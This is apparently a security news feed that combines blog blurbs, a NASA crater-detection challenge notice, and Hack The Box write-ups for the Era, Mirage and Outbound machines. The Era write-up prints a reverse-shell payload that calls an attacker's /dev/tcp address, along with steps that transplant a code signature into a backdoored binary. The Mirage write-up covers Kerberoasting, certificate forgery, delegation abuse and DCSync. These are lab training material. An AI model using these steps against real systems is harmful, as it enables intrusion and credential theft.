Security headlines distract, but the threats keeping CISOs awake are fundamental gaps and software supply chain risks. Learn why basics and visibility matter most.
The post Sleepless in Security: Whatβs Actually Keeping CISOs Up at NightΒ appeared first on Security Boulevard.
In this writeup, we will explore the βEraβ machine from Hack The Box, categorized as an Medium difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.
The goal of this walkthrough is to complete the βEraβ machine from Hack The Box by achieving the following objectives:
Initial enumeration revealed a hidden virtual host file.era.htb and a simple file-sharing web application that allowed registration and login. After creating an account, it quickly became clear that the download.php endpoint suffered from a severe Insecure Direct Object Reference (IDOR) vulnerability: any authenticated user could access any file on the platform simply by guessing its numeric ID. By fuzzing IDs 1β5000, two admin-uploaded archives were retrieved β a complete site backup containing the source code and SQLite database, and a signing.zip archive containing an SSH private key. The leaked database also exposed clear-text credentials, including eric:america. Because the ssh2 PHP extension was loaded on the server, the ssh2:// stream wrapper could be abused through the same vulnerable download endpoint.
While exploring the system as eric, a root-owned executable /opt/AV/periodic-checks/monitor was discovered that runs periodically via cron (confirmed by entries in status.log). The binary performed a custom integrity check using a digital signature stored in an ELF section named .text_sig. Using objcopy, the legitimate signature was extracted from the original binary. On the attackerβs machine, a malicious statically linked reverse-shell binary (monitor_backdoor) was compiled, and the legitimate .text_sig section was injected into it with objcopy βadd-section. The backdoored binary was then transferred to the target and used to overwrite the original monitor executable (the directory was world-writable). When the cron job next executed, the malicious binary ran as root and immediately connected back, delivering a root shell. The root flag was then read directly from /root/root.txt, completing the compromise.
Reconnaissance:
Nmap Scan:
Begin with a network scan to identify open ports and running services on the target machine.
Nmap Output:
Analysis:
Perform web enumeration to discover potentially exploitable directories and files.
Gobuster DNS scan on era.htb finishes with no subdomains found β clean miss on the big wordlist. Time to dig deeper or move to vhost/directory brute.
ffuf virtual-host brute on era.htb reveals file.era.htb (302 redirect + different response size) β jackpot! Thatβs our real target. Add to /etc/hosts and move in.
ffuf virtual-host brute on era.htb reveals file.era.htb (302 redirect + different response size) β jackpot! Thatβs our real target. Add to /etc/hosts and move in.
ffuf with -fw 4 (filter responses with exactly 4 words) nails it β file.era.htb returns 200 + 6765 bytes while everything else 302s with tiny bodies. Clear hit, thatβs our hidden subdomain. Add to hosts and go!
Web Application Exploration:
Accessing http://era.htb shows the Era Designs homepageβa clean marketing site with navigation (Home, Services, About, Portfolio, Clients, Team, Contact) and a hero section featuring yellow vases, a white sofa, and βSUCCESS OF YOUR BUSINESSβ text with a βFIND OUT MOREβ button.
Burp shows a clean GET to http://era.htb β 200 OK from nginx/1.18.0 (Ubuntu). Response is a standard Bootstrap-styled marketing page titled βEra Designsβ with no forms or backend endpoints β just a static landing site. Nothing juicy here.
Clean βWelcome to Era Storage!β page with four big blue buttons: Manage Files, Upload Files, Update Security Questions, and Sign In. This is the main hub of the entire app.
Very minimal registration: only two fields β Username and Password. No email, no captcha, no security questions during signup.
Forgot-password bypass: enter username and answer the three hardcoded questions (motherβs maiden name, first pet, city of birth).
Classic centred login box with Username + Password on a blue-green gradient background β the page weβre redirected to after registration.
Successful POST to /register.php β 200 OK + automatic redirect to login.php. Account creation confirmed.
After picking a new username (e.g., βdarkβ), registration succeeds and the app displays: βRegistration successful! Redirecting to login pageβ¦β β account creation is instant and working.
POST to /login.php with username=dark&password=admin123 returns 302 Found β Location: manage.php and sets a PHPSESSID cookie. We are now authenticated as the βdarkβ user.
GET to /manage.php with the same PHPSESSID cookie returns 200 OK and the full HTML of the logged-in dashboard (title: βEra β Manageβ).
The main post-login page βManage Your Files & Settingsβ shows:
Authenticated view of /upload.php. Simple file upload form titled βUpload Filesβ with a βBrowseβ¦β button (currently βNo files selected.β) and a blue βUploadβ button. No restrictions visible on file type or size yet.
Same upload page, but now the user has selected a harmless file named dark.txt. Shows the form ready to submit β this is just confirming normal upload functionality works.
After uploading dark.txt, the app redirects to /download.php?id=6615 and shows βYour Download Is Ready!β with the filename and a download button. Key observation: files are accessed via a numericid` parameter β classic candidate for Insecure Direct Object Reference (IDOR).
After clicking βUploadβ, the app displays a green βUpload Successful!β banner and immediately provides a direct download link in the format: http://file.era.htb/download.php?id=6615 This confirms uploads work and every file gets its own numeric ID β setting the stage for IDOR testing and potential privilege escalation via file access across users.
Legitimate request to http://file.era.htb/download.php?id=6615 returns the expected βYour Download Is Ready!β page with our uploaded file dark.txt. Confirms the download endpoint works normally for files we own.
Appending ?dl=true to the same request (download.php?id=6615&dl=true) bypasses the pretty download page and triggers an immediate file download:
Quickly create a list of all possible numeric file IDs from 1 to 5000. This will be used for brute-forcing the id parameter in download.php to find other usersβ files.
Final setup in Burp Intruder:
Burp Intruder attack against download.php?id=§§&dl=true using the 1β5000 payload list. All responses are 200 OK and exactly 7969 bytes long β including our own known file. This tells us there is no authorization check at all; every single existing file ID returns the exact same response length, meaning the server happily serves any file the numeric ID points to β confirmed horizontal Insecure Direct Object Reference (IDOR).
After confirming the IDOR on download.php?id=, we generate a list of IDs 1β5000 (seq 1 5000 > num.txt) and fuzz with ffuf, injecting our authenticated cookie and filtering out responses with exactly 3161 words (the empty download page). Only two IDs survive: 54 and 150. Both return much larger responses (~2552 words), indicating real files.
Accessing http://file.era.htb/download.php?id=54 reveals the filename site-backup-30-08-24.zip. This is the full source code backup of the Era file-sharing web app, uploaded by the admin.
Response headers confirm weβre downloading the raw site-backup-30-08-24.zip (2006697 bytes). The body starts with PK header (ZIP magic bytes).
Accessing http://file.era.htb/download.php?id=150 shows signing.zip. This smaller archive contains a private key and possibly a signing script β likely for code signing or authentication.
Response forces download of signing.zip (2746 bytes). This archive contains the adminβs private key (id_rsa) and a script β the golden ticket for SSH access as the admin/user.
After downloading IDs 54 and 150 via IDOR, we extract both ZIPs. One is site-backup-30-08-24.zip (clearly a website backup) and the other is signing.zip.
This is the full source code of the Era web application, straight from the adminβs upload (ID 54). Key files visible during extraction:
With this backup in hand, we now have everything:
This is the live SQLite database powering the entire Era application β straight from the adminβs site backup we downloaded via IDOR.
Weβve opened the real filedb.sqlite from the site backup and immediately listed the tables. As expected:
After extracting the site backup, we opened the leaked filedb.sqlite and dumped the users table with SELECT * FROM users;. The result reveals six accounts, including the admin (ID 1) with the bcrypt hash $2y$10$wDbohsUaezF74d3SMNRPi.o93wDxJqphM2m0VVup41If6WrYi.QPC and a fake email βMaria Oliver | Ottawaβ. The other five users (eric, veronica, yuri, john, ethan) also have proper bcrypt hashes. This gives us every credential on the box in plain text (hash) form, but we donβt even need to crack anything β the signing.zip we downloaded via the same IDOR already contains the adminβs SSH private key. The database dump is just the cherry on top, confirming total information disclosure and proving the IDOR let us steal every secret the application ever had. Weβre now one ssh -i id_rsa admin@file.era.htb away from both flags.
We dumped the users table into hash.txt for cracking. It contains six bcrypt hashes, including the adminβs: admin_ef01cab31aa:$2y$10$wDbohsUaezF74d3SMNRPi.o93wDxJqphM2m0VVup41If6WrYi.QPC and the other five regular users.
John instantly cracks two weak passwords:
The rest (including admin) remain uncracked in the short run.
Both attempts fail with Connection refused.
This confirms that only key-based authentication is allowed on the box (port 22 is open but rejects password logins entirely). The weak passwords we just cracked (america, mustang) are useless for SSH β the server is correctly hardened against password auth.
This is the βUpdate Security Questionsβ page from the Era web app, captured while logged in as the admin (admin_ef01cab31aa). The admin literally set all three security-question answers to admin
The server happily accepted it and responded with the green banner: βIf the user exists, answers have been updated β redirectingβ¦β
This confirms that there is no validation for security-question updates. Any logged-in user can silently overwrite anyone elseβs answers (including the adminβs) without knowing the old ones. Combined with the predictable username (admin_ef01cab31aa visible in the UI), this is a second, independent path to full account takeover via the forgot-password flow.
Screenshot shows a settings panel designed for managing uploaded files and controlling their retention time. At the top, an option allows automatic deletion to be enabled, letting the user choose a specific time interval and unit before files are removed. Below the settings, the interface lists existing uploaded files, such as dark.txt, which can be selected and deleted using the Delete Selected Files button. Additional options, including returning to the home page and resetting security questions, provide quick access to important account functions. Overall, the panel centralizes file management, privacy controls, and routine account maintenance.
Screenshot shows a login fallback page that allows access through security questions instead of a password. The interface displays the username along with three predefined security questions: motherβs maiden name, first petβs name, and city of birth. Each answer field has been filled with the value admin, suggesting that the account uses weak or predictable answers. After providing the answers, the user can click Verify and Log In to gain access. Overall, the page functions as an alternative authentication method, typically intended for account recovery when the main password is unavailable.
The auto-deletion feature is enabled, configured to remove uploaded items after 10 weeks. Two files are currently presentβsite-backup-30-08-24.zip and signing.zipβboth of which can be selected for removal using the red action button. The sidebar on the left offers quick links for browsing files, uploading new ones, modifying security questions, and signing out of the session. Overall, the page offers a simple layout for organizing uploaded content and managing basic account settings.
Attacker logs into the targetβs own vsftpd service (running on 10.10.11.79) using credentials yuri:yuri. Login succeeds instantly.
Inside the FTP session, dir shows only two directories: apache2_conf and php8.1_conf. Nothing else is present.
Inside the FTP session (logged in as yuri), the attacker runs dir in the root directory and sees only four small Apache configuration files:
After cd php8.1_conf, another dir reveals a long list of standard PHP 8.1 extension .so files (calendar.so, exif.so, ftp.so, pdo.so, phar.so, sqlite3.so, etc.). No interesting or custom files appear.
The internal vsFTPd instance is nothing more than a poorly chrooted service that accidentally exposes Apache configuration files and the real PHP extension directory. It provides zero writable paths, no sensitive data beyond what we already knew, and no escalation value. Just a nice confirmatory easter egg that the ssh2 extension is indeed loaded β but completely unnecessary for either the user or root compromise.
Screenshot reveals successful exploitation of an unrestricted file retrieval flaw on file.era.htb. Attacker submits a malicious GET request to download.php, weaponizing PHPβs ssh2.exec stream wrapper alongside command injection. Payload inside id parameter uses ssh2.exec://eric:america@127.0.0.1/ then pipes a base64-encoded reverse shell that instructs victim host to initiate connection toward attacker address 10.10.14.189 on port 9007. Flawed script directly feeds user-supplied input into readfile() or equivalent without validation. PHP detects ssh2.exec wrapper, authenticates locally via SSH as user eric using password america, executes hostile command, and returns resulting output (nearly empty) as response body. Web server replies with 200 OK and 136 bytes of data, confirming reverse shell triggered successfully. Exploit highlights classic stream-wrapper abuse transforming simple download vulnerability into complete remote code execution.
This second capture shows a polished version of the same remote code execution attack against download.php on file.era.htb. Attacker now places a cleaner payload inside the format parameter: ssh2.exec://eric:america@127.0.0.1/bash -c βbash -i >/dev/tcp/10.10.14.189/9007 0>&1β followed by |base64 -d |bash. After URL decoding, PHP interprets the ssh2.exec wrapper, authenticates to localhost SSH as user eric using password america, runs the quoted reverse-shell command, decodes any remaining base64 payload if needed, and finally spawns an interactive bash session that connects back to 10.10.14.189:9007. Server returns HTTP 200 OK with a 153-byte body containing wrapper startup messages, confirming successful command execution. Compared to the previous attempt, this refined one-liner removes unnecessary encoding layers while remaining effective, proving the attacker now enjoys a stable reverse shell on the target system.
Attacker stuffs this tightly-encoded string into the format parameter:
ssh2.exec://eric:america@127.0.0.1/bash%20-c%20%22bash%20-i%3E%26/dev/tcp/10.10.14.189/9007%200%3E%261;true%27
Once decoded, PHP sees:
ssh2.exec://eric:america@127.0.0.1/bash -c βbash -i>&/dev/tcp/10.10.14.189/9007 0>&1;true'β
Every dangerous character (< > &) appears percent-encoded, slipping past basic filters. The trailing ;trueβ cleanly terminates the command and avoids breaking bash syntax. No base64 gymnastics required.
PHP dutifully opens a local SSH session as user eric with password america, runs the quoted command, and instantly redirects all shell I/O over TCP to 10.10.14.189:9007. Result: a clean, stable, fully interactive reverse shell that survives repeated use. Target machine now belongs to the attacker.
On the attack machine, netcat listens on port 9007 (nc -lvnp 9007). As soon as the final ssh2.exec payload hits download.php, the target instantly connects back from IP 10.10.11.79. Shell lands as user eric on hostname era (prompt: eric@era:~$)
Eric managed to read user.txt and obtained the flag
Privilege Escalation:
Eric runs sudo -l to check which sudo privileges are available. The system replies that a terminal and password are required, meaning eric has no passwordless sudo rights and cannot directly escalate using sudo.
Eric executes find / -perm 4000 2>/dev/null to hunt for SUID binaries system-wide. The command returns no results (screen stays empty), indicating no obvious SUID files exist that could be abused.
Eric navigates to /opt and runs ls. Output shows a single directory named AV. This immediately catches attention β custom software installed under /opt is a classic spot for privilege-escalation vectors on HTB machines.
Eric enters /opt/AV/periodic-checks and runs ls. Two files appear: monitor (a root-owned executable) and status.log. The presence of a root-owned binary in a writable directory strongly suggests this monitor program runs periodically as root (likely via cron) and will be the intended privilege-escalation target.
I runs strings monitor. Among normal library calls, two crucial strings appear: β[] System scan initiatedβ¦β and β[] No threats detected. Shutting downβ¦β. These exact strings match the log entries, proving monitor is the binary executed by root during each scan.
I checks status.log in /opt/AV/periodic-checks. The log shows the monitor binary runs periodically as root, prints β[*} System scan initiatedβ¦β, then β[SUCCESS] No threats detected.β β confirming it is a scheduled root job and the real escalation target.
We tries to open a file called dark.c inside /dev/shm but vi fails with βcommand not foundβ. This reveals the reverse shell lacks a proper $PATH and most binaries β a common issue with raw /dev/tcp shells.
On the attackerβs local machine, the file dark.c contains a simple malicious payload: a single system() call that spawns another reverse shell back to 10.10.14.189:9007. The attacker has prepared this source code to compile and drop on the target.
On the attackerβs local machine, gcc compiles the malicious dark.c source into a statically linked binary named monitor_backdoor β a perfect drop-in replacement for the legitimate monitor program.
I uses curl http://10.10.14.189/monitor_backdoor -o monitor_backdoor to download the final backdoored binary from the attackerβs web server directly into the current directory (or /dev/shm). The transfer completes successfully (754 KB at ~1.4 MB/s).
The stage is now set: once the original monitor binary is replaced with this backdoor, the next root cron execution will instantly grant a root shell back to the attacker.
Command such as objcopy βdump-section .text_sig=sig /opt/AV/periodic-checks/monitor to extract the original monitor binaryβs .text_sig section (a custom digital signature) and save it as a file called sig inside /dev/shm.
I runs objcopy βadd-section .text_sig=sig monitor_backdoor, injecting the legitimate signature extracted from the real monitor into the malicious backdoored version. This preserves the signature so the root-run scanner will accept the fake binary.
To completes the attack by overwriting the legitimate monitor binary with the backdoored version: cp monitor_backdoor /opt/AV/periodic-checks/monitor The root-owned executable that runs periodically via cron is now fully replaced.
The cron job fires, executes the backdoored monitor as root, and the payload instantly triggers. Attacker catches a new reverse shell that lands directly as root@era: ~#. The box is fully compromised.
Root reads the final flag immediately after gaining the privileged shell
The post Hack The Box: Era Machine Walkthrough β Medium Difficulity appeared first on Threatninja.net.
Alan reflects on a turbulent year in DevSecOps, highlighting the rise of AI-driven security, the maturing of hybrid work culture, the growing influence of platform engineering, and the incredible strength of the DevSecOps community β while calling out the talent crunch, tool sprawl and security theater the industry must still overcome.
The post What Iβm Thankful for in DevSecOps This Year: Living Through Interesting Times appeared first on Security Boulevard.
Crater rims are vital landmarks for planetary science and navigation. Yet detecting them in real imagery is tough, with shadows, lighting shifts, and broken edges obscuring their shape.
This project invites you to develop methods that can reliably fit ellipses to crater rims, helping advance future space exploration.
In the pursuit of next generation, terrain-based optical navigation, NASA is developing a system that will use a visible-light camera on a spacecraft to capture orbital images of lunar terrain and process the imagery to:
The focus of this project is the crater detection process.
Natural imagery varies significantly in lighting and will impact the completeness of crater rims in the images.
Award: $55,000 in total prizes
Open Date: November 25, 2025
Close Date: January 19, 2026
For more information, visit: https://www.topcoder.com/nasa-crater-detection
Security is reaching a breaking point as growing technical complexity becomes a major risk vector. Learn why modern systems amplify threatsβand how to stay ahead.
The post Security is at a Tipping Point: Why Complexity is the New Risk VectorΒ appeared first on Security Boulevard.
In this writeup, we will explore the βMirageβ machine from Hack The Box, categorized as a Hard difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.
The goal of this walkthrough is to complete the βMirageβ machine from Hack The Box by achieving the following objectives:
We kicked off with NFS, SMB, and Kerberos enumeration, mounted the open MirageReports share, and grabbed two internal PDFs. One revealed the missing hostname nats-svc.mirage.htb. We hijacked DNS with DNSadder.py, funneled all NATS traffic through our proxy, and snatched JetStream auth_logs messages β yielding valid credentials for david.jjackson. After syncing our clock with the DC, we scored a TGT, fired up Evil-WinRM, and landed on the domain controller as david.jjackson to claim the user flag.
We started with david.jjacksonβs ticket, and then kerberoasted nathan.aadam. After cracking his password, we gained his shell and subsequently discovered mark.bbondβs credentials. From there, we also retrieved the Mirage-Service$ managed password. With these pieces, we used Certipy to forge a DC01$ certificate, and as a result, we configured RBCD so mark.bbond could impersonate the domain controller. Once that was in place, we executed DCSync to dump all domain hashes, including Administrator. Finally, we obtained an Admin TGT and used EvilβWinRM to open a shell as Administrator, which ultimately allowed us to claim the root flag.
Reconnaissance:
Nmap Scan:
Begin with a network scan to identify open ports and running services on the target machine.
Loginnmap -sC -sV -oA initial 10.10.11.78 Nmap Output:
ββ[dark@parrot]β[~/Documents/htb/mirage]
ββββΌ $nmap -sC -sV -oA initial 10.10.11.78
Nmap scan report for 10.10.11.78
Host is up (0.15s latency).
Not shown: 987 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-11-20 20:52:31Z)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Not valid before: 2025-07-04T19:58:41
|_Not valid after: 2105-07-04T19:58:41
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Not valid before: 2025-07-04T19:58:41
|_Not valid after: 2105-07-04T19:58:41
|_ssl-date: TLS randomness does not represent time2049/tcp open nlockmgr 1-4 (RPC #100021)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Not valid before: 2025-07-04T19:58:41
|_Not valid after: 2105-07-04T19:58:41
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Not valid before: 2025-07-04T19:58:41
|_Not valid after: 2105-07-04T19:58:41
|_ssl-date: TLS randomness does not represent time
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: -22m05s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-11-20T20:53:32
|_ start_date: N/AAnalysis:
Perform web enumeration to discover potentially exploitable directories and files.
We scanned SMB and saw the service up, but mirage.htb blocked all NTLM logins (even dark:dark failed with STATUS_NOT_SUPPORTED). Kerberos only from now on.
We added the domain/realm to /etc/krb5.conf and used -k flags everywhere β no more passwords over the wire.
The showmount -e mirage.htb command reveals that the target is exporting an NFS share named /MirageReports, and it is accessible to everyone. This means the share does not enforce host-based restrictions, allowing any machine to mount it. Since the export is world-accessible, itβs likely a good entry point for enumeration, as you can mount the share locally and inspect its contents for sensitive files, misconfigurations, or clues leading to further access.
The mount attempt failed because the local path /mnt/mirage doesnβt exist on our machine. NFS requires a valid directory to mount a remote share, so before accessing the exported /MirageReports share, we need to create a local mount point.
Creating the directory with mkdir -p /mnt/mirage resolves the issue, allowing us to mount the share and begin enumerating its contents.
The βfailed to apply fstab optionsβ error usually comes from stale mount settings or syntax issues. Just rerun the command cleanly or add -o vers=3,nolock β it fixes the problem in HTB.
We corrected the syntax (added -o vers=3,nolock when needed) and re-ran mount -t nfs mirage.htb:/MirageReports /mnt/mirage. The share mounted perfectly and gave us full access to the internal reports.
After mounting the NFS share, ls reveals two PDFs: Incident_Report_Missing_DNS_Record_nats-svc.pdf and Mirage_Authentication_Hardening_Report.pdf. These internal reports likely expose misconfigurations and are key for further enumeration.
This command copies all files from the mounted NFS share at /mnt/mirage into your current working directory using elevated privileges. It allows you to analyze the documents locally without needing to stay connected to the NFS share.
After copying, the files should now be available in your current working directory for further analysis.
Reviewing the Incident_Report_Missing_DNS_Record_nats-svc.pdf file revealed an additional hostname: nats-svc.mirage.htb.
The Incident Report showed nats-svc.mirage.htb missing from DNS β internal clients failed to resolve it. We fired up DNSadder.py, added a fake record to our proxy, and hijacked all NATS traffic β full MITM on auth and JetStream (including auth_logs).
NATS is a messaging system that helps different parts of a companyβs software talk to each other. Instead of applications connecting directly, they send messages through NATS, which delivers them quickly and reliably.
To install the NATS commandβline interface on Parrot OS, you can use the Go toolchain included in the system. Simply run the command go install github.com/nats-io/natscli/nats@latest, which downloads and compiles the latest version of the NATS CLI and places it in your Go binaries directory for use.
To verify that the NATS CLI installed correctly, simply run the nats command in your terminal. If the installation was successful, it should display the available subcommands and usage information, confirming that the tool is ready to use.
nats stream info auth_logs showed a small stream (max 100 messages) on subject logs.auth that currently held 5 messages β perfect for grabbing credentials.
We created a pull consumer named whare1 on the auth_logs stream using Dev_Account_A credentials. It fetches messages one-by-one with explicit acknowledgment, allowing us to retrieve all five stored authentication logs.
We fetched the five messages from the auth_logs stream using our whare1 consumer. Every message (subject logs.auth) contained the same authentication event:
All messages were acknowledged and consumed successfully, confirming we now have valid domain credentials.
The leaked david.jjackson:pN8kQmn6b86!1234@ credentials let us request a Kerberos TGT with impacket-getTGT. The first try failed due to clock skew; after sudo ntpdate -s 10.10.11.78, the second attempt succeeded and saved david.jjackson.ccache
After syncing time with sudo ntpdate -s 10.10.11.78, the second impacket-getTGT run succeeded and gave us a valid TGT.
This command sets the KRB5CCNAME environment variable to use the david.jjackson.ccache file as the active Kerberos ticket. It tells all Kerberosβaware tools to use this ticket automatically for authentication instead of a password.
Try running the command again if it doesnβt work on the first attempt.
With david.jjacksonβs ticket, we ran impacket-GetUserSPNs -k -no-pass and discovered a crackable Kerberos service ticket ($krb5tgs$23$) for the SPN HTTP/exchange.mirage.htb, belonging to the high-privileged user nathan.aadam (member of Exchange_Admins group).
We cracked the TGS hash using John and the RockYou wordlist, recovering the password 3edc#EDC3 for nathan.aadam β a weak credential that immediately granted us access to this Exchange Admins group member.
As nathan.aadam, we ran BloodHound and dumped the entire Active Directory structure for privilege escalation path hunting.
Mark.bbond is a member of the IT Support group, and he has the ForceChangePassword privilege over the user javier.mmarshall.
Javier.mmarshall has ReadGMSAPassword permission on the account Mirage-Service$.
nxc smb dc01.mirage.htb with nathan.aadam initially failed due to clock skew (krb_ap_err_skew). After syncing time again (ntpdate -s 10.10.11.78), authentication succeeded cleanly.
Same clock skew issue hit nxc smb. After ntpdate -s 10.10.11.78, it worked instantly and confirmed valid access as nathan.aadam : 3edc#EDC3 on the DC.
We used the cracked password 3edc#EDC3 to obtain a Kerberos TGT for nathan.aadam (impacket-getTGT). The ticket was saved as nathan.aadam.ccache, giving us full Kerberos access for the next steps
Connected instantly as nathan.aadam β full PowerShell access on the Domain Controller.
We can read the user flag by typing the βtype user.txtβ command
We checked AD LogonHours. javier.mmarshall had all zeroes β account completely locked out (canβt log in anytime). This hinted the account was disabled but still present for potential abuse.
No default password was detected.
You can transfer the WinPEAS executable to the compromised host by running the upload command inside your EvilβWinRM session. This pushes the file from your attack machine directly into the victimβs system, allowing you to execute it afterwards for privilegeβescalation enumeration.
No usable credentials were identified.
This command verifies SMB access on dc01.mirage.htb using Kerberos authentication with the mark.bbond credentials. The scan shows the host details and confirms a successful login, indicating that the provided password is valid and SMB authentication for this account works correctly.
The command requests a Kerberos TGT for the user MARK.BBOND using the discovered password 1day@atime. By specifying the domain controller IP, the tool authenticates against the DC and generates a valid ticket. Once successful, the resulting Kerberos ticket is saved locally as MARK.BBOND.ccache for use in later Kerberosβbased operations.
A password reset for the account javier.mmarshall was performed using bloodyAD. By authenticating as mark.bbond with Kerberos (-k) and supplying valid domain credentials, the command successfully updated the userβs password to p@ssw0rd123, confirming the operation completed without issues.
Attempting to obtain a TGT for the account javier.mmarshall with impacket-getTGT results in a KDC_ERR_CLIENT_REVOKED error. This indicates the credentials are no longer valid because the account has been disabled or otherwise revoked in Active Directory, preventing any Kerberos authentication from succeeding.
By running the command shown above, the password update completed successfully.
As mark.bbond, we used BloodyAD to read the msDS-ManagedPassword attribute of the Mirage-Service$ managed service account and instantly retrieved its current plaintext password + NTLM hash.
We used Impacket to request a Kerberos TGT for Mirage-Service$ with its leaked NTLM hash (pass-the-hash). This gave us a valid ticket without ever needing the plaintext password.
We asked the domain CA for a certificate using mark.bbond (now pretending to be dc01$). The CA accepted it and gave us a shiny dc01.pfx file that lets us log in as the real domain controller machine account.
After exporting the Kerberos ticket with export KRB5CCNAME=mark.bbond.ccache, a certificate request is made using Certipy
We requested a certificate for mark.bbond (UPN = dc01$@mirage.htb). The CA issued it without issues β dc01.pfx ready for authentication as the DC machine account.
We cleaned up by resetting mark.bbondβs UPN back to mark.bbond@mirage.htb with Certipy β leaving no obvious traces.
With the dc01.pfx certificate, Certipy authenticated us over LDAPS as MIRAGE\DC01$ β we now had full LDAP control as the domain controller itself.
We used Certipy to grant mark.bbond Resource-Based Constrained Delegation over DC01$ β now mark.bbond can impersonate anyone (including Administrator) to the domain controller.
As mark.bbond, we ran impacket-getST to impersonate DC01$ and request a CIFS ticket for the real DC. Delegation succeeded β valid ticket saved.
The Kerberos ticket was set as the active credential cache by exporting it to the KRB5CCNAME environment variable:
export KRB5CCNAME=DC01$@<a>CIFS_dc01.mirage.htb@MIRAGE.HTB.ccache</a>
With the delegated CIFS ticket, we executed impacket-secretdump -k dc01.mirage.htb and successfully dumped the entire NTDS.DIT β every user and machine hash, including Administratorβs, was now ours.
The impacket-getTGT command was executed using the Administrator NTLM hash to request a Kerberos TGT from the Mirage domain controller. The request completed successfully, and the resulting ticket was saved locally as Administrator.ccache.
The evil-winrm command was used to connect to dc01.mirage.htb with Kerberos authentication. EvilβWinRM initialized successfully, displaying standard warnings about Rubyβs pathβcompletion limitations and noting that the provided username is unnecessary when a Kerberos ticket is already available. The session then proceeded to establish a connection with the remote host.
We can read the root flag by typing the βtype root.txtβ command
The post Hack The Box: Mirage Machine Walkthrough β Hard Difficulity appeared first on Threatninja.net.
Introduction to Outbound:
In this write-up, we will explore the βOutboundβ machine from Hack The Box, categorised as an easy difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.
The goal of this walkthrough is to complete the βOutboundβ machine from Hack The Box by achieving the following objectives:
User Flag:
The initial foothold was achieved by exploiting CVEβ2025β49113 in Roundcube version 1.6.10 using Tylerβs valid credentials. This vulnerability in the file upload feature allowed remote code execution, enabling a reverse shell that was upgraded to a fully interactive shell. Investigation of the Roundcube configuration revealed the database credentials, which were used to access the MariaDB instance. Within the database, Jacobβs encrypted session data was located and decrypted using the known DES key, revealing his plaintext password. Using this password, SSH authentication was successful, providing access to Jacobβs environment and allowing the retrieval of the user flag.
Root Flag:
Privilege escalation was identified through sudo -l, which showed that the user could execute /usr/bin/below. Research revealed that the installed version of below is vulnerable to CVEβ2025β27591, which involves a world-writable /var/log/below directory with permissions set to 0777. Exploiting this vulnerability using the publicly available Python PoC allowed execution of commands as root. Leveraging this access, the root flag was retrieved by reading the /root/root.txt file.
Reconnaissance:
Nmap Scan:
Begin with a network scan to identify open ports and running services on the target machine.
nmap -sC -sV 10.10.11.77 -oA initial Nmap Output:
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 9.6p1 Ubuntu 3ubuntu13.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 0c:4b:d2:76:ab:10:06:92:05:dc:f7:55:94:7f:18:df (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBN9Ju3bTZsFozwXY1B2KIlEY4BA+RcNM57w4C5EjOw1QegUUyCJoO4TVOKfzy/9kd3WrPEj/FYKT2agja9/PM44=
| 256 2d:6d:4a:4c:ee:2e:11:b6:c8:90:e6:83:e9:df:38:b0 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIH9qI0OvMyp03dAGXR0UPdxw7hjSwMR773Yb9Sne+7vD
80/tcp open http syn-ack ttl 63 nginx 1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to http://mail.outbound.htb/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.24.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelAnalysis:
Accessing the http://mail.outbound.htb portal reveals a Roundcube Webmail interface. We can proceed to log in using the provided credentials.
Entering the Tyler credentials allows us to access the Roundcube Webmail interface.
